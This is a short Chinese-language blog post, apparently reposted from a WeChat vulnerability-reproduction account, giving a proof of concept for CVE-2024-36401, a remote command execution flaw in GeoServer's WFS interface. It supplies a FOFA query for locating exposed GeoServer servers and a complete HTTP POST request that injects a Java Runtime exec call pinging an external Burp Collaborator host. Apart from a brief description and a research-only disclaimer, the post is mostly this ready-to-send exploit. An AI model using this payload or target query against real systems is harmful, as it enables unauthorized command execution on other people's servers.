GeoServer /geoserver/wfs接口存在远程命令执行漏洞附POC

admin

138985
文章

114
评论

2024年7月10日18:40:03评论52 views字数 1029阅读3分25秒阅读模式

1. GeoServer /geoserver/wfs接口简介

微信公众号搜索：南风漏洞复现文库该文章南风漏洞复现文库公众号首发

GeoServer 是一个开源的地理空间服务器

2.漏洞描述

GeoServer是OGC Web服务器规范的J2EE实现，利用GeoServer可以方便地发布地图数据，允许用户对要素数据进行更新、删除、插入操作，通过GeoServer可以比较容易地在用户之间迅速共享空间地理信息。GeoServer /geoserver/wfs接口存在远程命令执行漏洞

CVE编号:CVE-2024-36401

CNNVD编号:

CNVD编号:

3.影响版本

GeoServer

4.fofa查询语句

app="GeoServer"

5.漏洞复现

漏洞链接：http://xxx.xxx.xx.xx/geoserver/wfs

漏洞数据包：

POST /geoserver/wfs HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent:Mozilla/5.0(X11;Linux x86_64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/87.0.4280.88Safari/537.36
Accept-Encoding: gzip, deflate
Accept:*/*
Connection: close
Content-Length: 362

<wfs:GetPropertyValue service='WFS' version='2.0.0'
xmlns:topp='http://www.openplans.org/topp'
xmlns:fes='http://www.opengis.net/fes/2.0'
xmlns:wfs='http://www.opengis.net/wfs/2.0'
valueReference='exec(java.lang.Runtime.getRuntime(),"ping 876268.okcfke24wzvpm2c1uyqdbfa3iuokc9.burpcollaborator.net")'>
<wfs:Query typeNames='topp:states'/>
</wfs:GetPropertyValue>

原文始发于微信公众号（南风漏洞复现文库）：GeoServer /geoserver/wfs接口存在远程命令执行漏洞附POC

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

GeoServer /geoserver/wfs接口存在远程命令执行漏洞附POC

1. GeoServer /geoserver/wfs接口简介

2.漏洞描述

3.影响版本

4.fofa查询语句

5.漏洞复现

三星路由器WLAN-AP-WEA453e-未授权RCE等多个漏洞

UNACMS PHP对象注入漏洞(CVE-2025-32101)

MRCMS（蘑菇建站）跨站脚本漏洞及解决方法（CNVD-2025-05252、CVE-2025-2195）

【风险通告】PyTorch存在远程代码执行漏洞（CVE-2025-32434）

PyTorch 中存在严重的RCE漏洞

CVE-2025-22457：基于堆栈的远程缓冲区溢出的POC验证脚本

Kubernetes CVE-2025-1974 RCE POC

CVE-2025-27218｜Sitecore CMS远程代码执行漏洞

CentreStack 反序列化漏洞 (CVE-2025-30406)

Windows提权漏洞CVE-2025-21204

发表评论

在线咨询

微信